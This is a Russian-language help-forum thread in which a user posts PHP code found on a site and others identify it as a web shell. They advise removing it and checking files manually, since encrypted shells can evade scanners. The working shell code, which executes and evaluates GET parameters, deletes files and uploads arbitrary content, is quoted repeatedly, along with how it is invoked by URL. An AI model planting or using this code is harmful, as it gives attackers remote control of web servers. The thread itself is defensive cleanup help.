Обучение/Помощь новичкам | может кто поможет
DELETED
Автор
27 марта 2019, в 19:47
Delete
<?
echo 'OS : '.@substr(@php_uname(),0,120).'<br>';
echo 'User : '.get_current_user().'';
?>
<FORM METHOD=GET><INPUT TYPE="text" NAME="cmd"><INPUT TYPE="submit" value="EXEC"></FORM>
<FORM METHOD=GET><INPUT TYPE="text" NAME="eval"><INPUT TYPE="submit" value="EVAL"></FORM>
<FORM METHOD=GET><INPUT TYPE="text" NAME="unlink"><INPUT TYPE="submit" value="unlink"></FORM>
<FORM METHOD=GET><INPUT TYPE="text" NAME="upload"> to: <INPUT TYPE="text" NAME="to"><INPUT TYPE="submit" value="upload"></FORM>
<pre>
<?
if($_GET['cmd']){echo exec($_GET['cmd']);}
if($_GET['eval']){echo eval($_GET['eval']);}
if($_GET['unlink']){echo unlink($_GET['unlink']);}
if($_GET['upload']){$f=file_get_contents($_GET['upload']);$fp=fopen($_GET['to'],"w");fwrite($fp,$f);fclose($fp);}
?>
DELETED
27 марта 2019, в 20:06
Delete
goldgood (27.03.2019 в 19:47)
Случайно не так шел выглядит
<?
echo 'OS : '.@substr(@php_uname(),0,120).'<br>';
echo 'User : '.get_current_user().'';
?>
<FORM METHOD=GET><INPUT TYPE="text" NAME="cmd"><INPUT TYPE="submit" value="EXEC"></FORM>
<FORM METHOD=GET><INPUT TYPE="text" NAME="eval"><INPUT TYPE="submit" value="EVAL"></FORM>
<FORM METHOD=GET><INPUT TYPE="text" NAME="unlink"><INPUT TYPE="submit" value="unlink"></FORM>
<FORM METHOD=GET><INPUT TYPE="text" NAME="upload"> to: <INPUT TYPE="text" NAME="to"><INPUT TYPE="submit" value="upload"></FORM>
<pre>
<?
if($_GET['cmd']){echo exec($_GET['cmd']);}
if($_GET['eval']){echo eval($_GET['eval']);}
if($_GET['unlink']){echo unlink($_GET['unlink']);}
if($_GET['upload']){$f=file_get_contents($_GET['upload']);$fp=fopen($_GET['to'],"w");fwrite($fp,$f);fclose($fp);}
?>
Случайно не так шел выглядит
<?
echo 'OS : '.@substr(@php_uname(),0,120).'<br>';
echo 'User : '.get_current_user().'';
?>
<FORM METHOD=GET><INPUT TYPE="text" NAME="cmd"><INPUT TYPE="submit" value="EXEC"></FORM>
<FORM METHOD=GET><INPUT TYPE="text" NAME="eval"><INPUT TYPE="submit" value="EVAL"></FORM>
<FORM METHOD=GET><INPUT TYPE="text" NAME="unlink"><INPUT TYPE="submit" value="unlink"></FORM>
<FORM METHOD=GET><INPUT TYPE="text" NAME="upload"> to: <INPUT TYPE="text" NAME="to"><INPUT TYPE="submit" value="upload"></FORM>
<pre>
<?
if($_GET['cmd']){echo exec($_GET['cmd']);}
if($_GET['eval']){echo eval($_GET['eval']);}
if($_GET['unlink']){echo unlink($_GET['unlink']);}
if($_GET['upload']){$f=file_get_contents($_GET['upload']);$fp=fopen($_GET['to'],"w");fwrite($fp,$f);fclose($fp);}
?>
if($_GET['eval']){echo eval($_GET['eval']);} это веб шелл
Открывается так сайт.ру/файл.php?eval=команда например ls показывает файлы и папки директории. Таких может быть много там
P.s. exec тоже веб шелл
________
посл. ред. 27.03.2019 в 20:07; всего 1 раз(а); by 203138894
DELETED
Автор
27 марта 2019, в 20:09
Delete
DELETED
27 марта 2019, в 20:09
Delete
goldgood (27.03.2019 в 19:47)
Случайно не так шел выглядит
<?
echo 'OS : '.@substr(@php_uname(),0,120).'<br>';
echo 'User : '.get_current_user().'';
?>
<FORM METHOD=GET><INPUT TYPE="text" NAME="cmd"><INPUT TYPE="submit" value="EXEC"></FORM>
<FORM METHOD=GET><INPUT TYPE="text" NAME="eval"><INPUT TYPE="submit" value="EVAL"></FORM>
<FORM METHOD=GET><INPUT TYPE="text" NAME="unlink"><INPUT TYPE="submit" value="unlink"></FORM>
<FORM METHOD=GET><INPUT TYPE="text" NAME="upload"> to: <INPUT TYPE="text" NAME="to"><INPUT TYPE="submit" value="upload"></FORM>
<pre>
<?
if($_GET['cmd']){echo exec($_GET['cmd']);}
if($_GET['eval']){echo eval($_GET['eval']);}
if($_GET['unlink']){echo unlink($_GET['unlink']);}
if($_GET['upload']){$f=file_get_contents($_GET['upload']);$fp=fopen($_GET['to'],"w");fwrite($fp,$f);fclose($fp);}
?>
Случайно не так шел выглядит
<?
echo 'OS : '.@substr(@php_uname(),0,120).'<br>';
echo 'User : '.get_current_user().'';
?>
<FORM METHOD=GET><INPUT TYPE="text" NAME="cmd"><INPUT TYPE="submit" value="EXEC"></FORM>
<FORM METHOD=GET><INPUT TYPE="text" NAME="eval"><INPUT TYPE="submit" value="EVAL"></FORM>
<FORM METHOD=GET><INPUT TYPE="text" NAME="unlink"><INPUT TYPE="submit" value="unlink"></FORM>
<FORM METHOD=GET><INPUT TYPE="text" NAME="upload"> to: <INPUT TYPE="text" NAME="to"><INPUT TYPE="submit" value="upload"></FORM>
<pre>
<?
if($_GET['cmd']){echo exec($_GET['cmd']);}
if($_GET['eval']){echo eval($_GET['eval']);}
if($_GET['unlink']){echo unlink($_GET['unlink']);}
if($_GET['upload']){$f=file_get_contents($_GET['upload']);$fp=fopen($_GET['to'],"w");fwrite($fp,$f);fclose($fp);}
?>
Лучше уберите этот код полностью.
<?
if($_GET['cmd']){echo exec($_GET['cmd']);}
if($_GET['eval']){echo eval($_GET['eval']);}
if($_GET['unlink']){echo unlink($_GET['unlink']);}
if($_GET['upload']){$f=file_get_contents($_GET['upload']);$fp=fopen($_GET['to'],"w");fwrite($fp,$f);fclose($fp);}
?>
Не обращал внимания, там кроме веб щеллов и скритая форма загрузки есть.
DELETED
27 марта 2019, в 20:11
Delete
goldgood (27.03.2019 в 20:09)
203138894 , а есть какие нибудь методы их искать?
203138894 , а есть какие нибудь методы их искать?
Во 1) удали не нужные модули, игры например. Файлы типа index1.php и т.п.
А проверять я советую по ручному так как что то может программа не учесть что то пропускать. Например если шелл зашифрован программа не находит в нём опасности но есть в нем опасность.
________
посл. ред. 27.03.2019 в 20:12; всего 1 раз(а); by 203138894
DELETED
27 марта 2019, в 20:13
Delete
goldgood (27.03.2019 в 19:47)
Случайно не так шел выглядит
<?
echo 'OS : '.@substr(@php_uname(),0,120).'<br>';
echo 'User : '.get_current_user().'';
?>
<FORM METHOD=GET><INPUT TYPE="text" NAME="cmd"><INPUT TYPE="submit" value="EXEC"></FORM>
<FORM METHOD=GET><INPUT TYPE="text" NAME="eval"><INPUT TYPE="submit" value="EVAL"></FORM>
<FORM METHOD=GET><INPUT TYPE="text" NAME="unlink"><INPUT TYPE="submit" value="unlink"></FORM>
<FORM METHOD=GET><INPUT TYPE="text" NAME="upload"> to: <INPUT TYPE="text" NAME="to"><INPUT TYPE="submit" value="upload"></FORM>
<pre>
<?
if($_GET['cmd']){echo exec($_GET['cmd']);}
if($_GET['eval']){echo eval($_GET['eval']);}
if($_GET['unlink']){echo unlink($_GET['unlink']);}
if($_GET['upload']){$f=file_get_contents($_GET['upload']);$fp=fopen($_GET['to'],"w");fwrite($fp,$f);fclose($fp);}
?>
Случайно не так шел выглядит
<?
echo 'OS : '.@substr(@php_uname(),0,120).'<br>';
echo 'User : '.get_current_user().'';
?>
<FORM METHOD=GET><INPUT TYPE="text" NAME="cmd"><INPUT TYPE="submit" value="EXEC"></FORM>
<FORM METHOD=GET><INPUT TYPE="text" NAME="eval"><INPUT TYPE="submit" value="EVAL"></FORM>
<FORM METHOD=GET><INPUT TYPE="text" NAME="unlink"><INPUT TYPE="submit" value="unlink"></FORM>
<FORM METHOD=GET><INPUT TYPE="text" NAME="upload"> to: <INPUT TYPE="text" NAME="to"><INPUT TYPE="submit" value="upload"></FORM>
<pre>
<?
if($_GET['cmd']){echo exec($_GET['cmd']);}
if($_GET['eval']){echo eval($_GET['eval']);}
if($_GET['unlink']){echo unlink($_GET['unlink']);}
if($_GET['upload']){$f=file_get_contents($_GET['upload']);$fp=fopen($_GET['to'],"w");fwrite($fp,$f);fclose($fp);}
?>
А в каком файле вы нашли этот код? Гляну другой бек, может тот имеет мало дыр
DELETED
Автор
27 марта 2019, в 20:14
Delete
ОБычно на dcms он так выглядит?
DELETED
27 марта 2019, в 20:15
Delete
goldgood (27.03.2019 в 20:14)
203138894 , каждый файл в ручную нужно проверять?
ОБычно на dcms он так выглядит?
203138894 , каждый файл в ручную нужно проверять?
ОБычно на dcms он так выглядит?
По разному, иногда есть и зашифрованный типа: fgv5dhjdnsekz4bvciddbw1dxhxxhvii7ewzxb
DELETED
27 марта 2019, в 20:17
Delete
goldgood (27.03.2019 в 20:14)
203138894 , каждый файл в ручную нужно проверять?
ОБычно на dcms он так выглядит?
203138894 , каждый файл в ручную нужно проверять?
ОБычно на dcms он так выглядит?
Да, если подозрительный файл, открой в браузере, если это обичный шелл сразу узнаешь.